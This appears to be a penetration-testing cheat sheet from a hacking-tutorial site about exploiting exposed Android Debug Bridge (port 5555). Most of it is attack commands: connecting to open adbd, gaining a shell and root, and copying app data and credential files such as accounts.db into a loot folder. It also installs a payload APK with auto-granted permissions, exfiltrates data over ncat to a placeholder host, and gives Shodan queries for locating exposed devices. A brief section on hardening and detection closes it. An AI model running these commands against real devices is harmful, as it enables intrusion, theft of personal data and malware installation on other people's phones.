Android Debug Bridge (ADB) - PORT 5555

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic Info

Default legacy port: 5555/tcp (classic adb tcpip mode). Modern Android (11+) uses TLS pairing and mDNS — ports are dynamic.
If you can reach adbd you can often get a shell (adb shell), install APKs, steal app data, and pivot.
High risk: any reachable adbd (TCP) should be treated as compromise-level. Block it and monitor mDNS records.

What is ADB?

ADB (Android Debug Bridge) is a command-line tool to communicate with Android devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.

Modern wireless debugging (Android 11+) adds TLS pairing and mDNS discovery — which changes the offensive surface: ports are discovered via mDNS and pairing is required for secure connections.

Nmap fingerprint (legacy):

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Enumeration

Quick Recon & Connect

If you find ADB exposed and reachable, act fast — many devices are ephemeral or reboot into safe modes.

# Classic connect (legacy adb tcpip mode)
adb connect <ip>[:<port>]      # default port 5555
adb devices -l                 # ensure device shows as "device"
adb shell                      # interactive shell (usually uid `shell`)
whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
adb root || true               # works on eng/userdebug/insecure builds, many emulators/IoT

If ro.adb.secure=1 (ADB auth), you need to be pre-authorized or use Android 11+ pairing flow.
Many vendor engineering images, devkits, emulators, TVs, STBs run adbd without auth or as root.

Quick Post‑Exploitation Checklist

Validate privileges & context

id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint

Enumerate apps & locate data

pm list packages -3                # third-party packages
pm path <pkg>                      # path to apk
# For debuggable apps without root
run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>

# With root
cp -a /data/data/<pkg> /sdcard/<pkg>
exit
adb pull "/sdcard/<pkg>"          # pull files to host

Artifacts of interest (root required):

/data/system/users/0/accounts.db (AccountManager)
/data/misc/wifi/ (saved networks / keys on older versions)
App SQLite DBs and shared_prefs under /data/data/

Note: Chrome and some apps encrypt or use OS-level protections — treat with care and follow legal/ethical rules.

Code Execution & Payload Delivery

Install and auto‑grant runtime permissions:

adb install -r -g payload.apk         # -g grants runtime perms in manifest
adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1

Directly start components:

adb shell am start -n <pkg>/<activity>
adb shell am startservice -n <pkg>/<service>
adb shell am broadcast -a <action>

Port Forwarding & Pivoting

Even without root, ADB is a great pivoting tool:

# Host -> device (access device-local service from host)
adb forward tcp:2222 tcp:22
adb forward tcp:8081 tcp:8080

# Device -> host (device can reach host services)
adb reverse tcp:1080 tcp:1080

File exfil over sockets (no sdcard writes):

# On host:
ncat -lvp 9000 > dump.tar
# On device (root or run-as as applicable):
adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000

Wireless Debugging (Android 11+)

Android 11+ uses TLS-protected wireless debugging with device-side pairing and mDNS discovery:

# On device: Developer options -> Wireless debugging -> Pair device
# On attacker host (same L2 network, mDNS allowed):
adb pair <device_ip>:<pair_port>   # enter 6-digit code shown on device
adb mdns services                  # discover _adb-tls-connect._tcp / _adb._tcp
adb connect <device_ip>:<conn_port>

mDNS service names:

_adb-tls-pairing._tcp (pairing)
_adb-tls-connect._tcp (paired connect)
_adb._tcp (legacy/plain)

Notes:

Ports are dynamic — don’t assume 5555.
If mDNS is filtered, legacy adb tcpip 5555 (USB-assisted) may still enable legacy mode until reboot.
Attackers with UI access or an MDM misconfig can enable wireless debugging and view pairing codes — establishing long-lived access.

Hardening & Detection (Defender Playbook)

Assume any reachable adbd is a high‑severity risk.

Immediate hardening steps:

# On device under your control
settings put global adb_enabled 0
setprop service.adb.tcp.port -1   # disable TCP listening (or: adb usb)
stop adbd; start adbd               # restart daemon

Network & monitoring:

Block inbound TCP/5555 and ADB-related dynamic ports on untrusted segments.
Block or monitor mDNS records: _adb._tcp, _adb-tls-connect._tcp, _adb-tls-pairing._tcp.
Inventory devices for insecure builds: check getprop ro.debuggable, ro.build.type, ro.adb.secure.
Revoke USB debugging authorizations in Developer options for managed devices.

Shodan Search

"android debug bridge"
port:5555 product:"Android Debug Bridge"

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousPostgresql - PORT 5432,5433 NextFile Transfer Cheatsheet: Windows and Linux

Last updated 9 minutes ago

Was this helpful?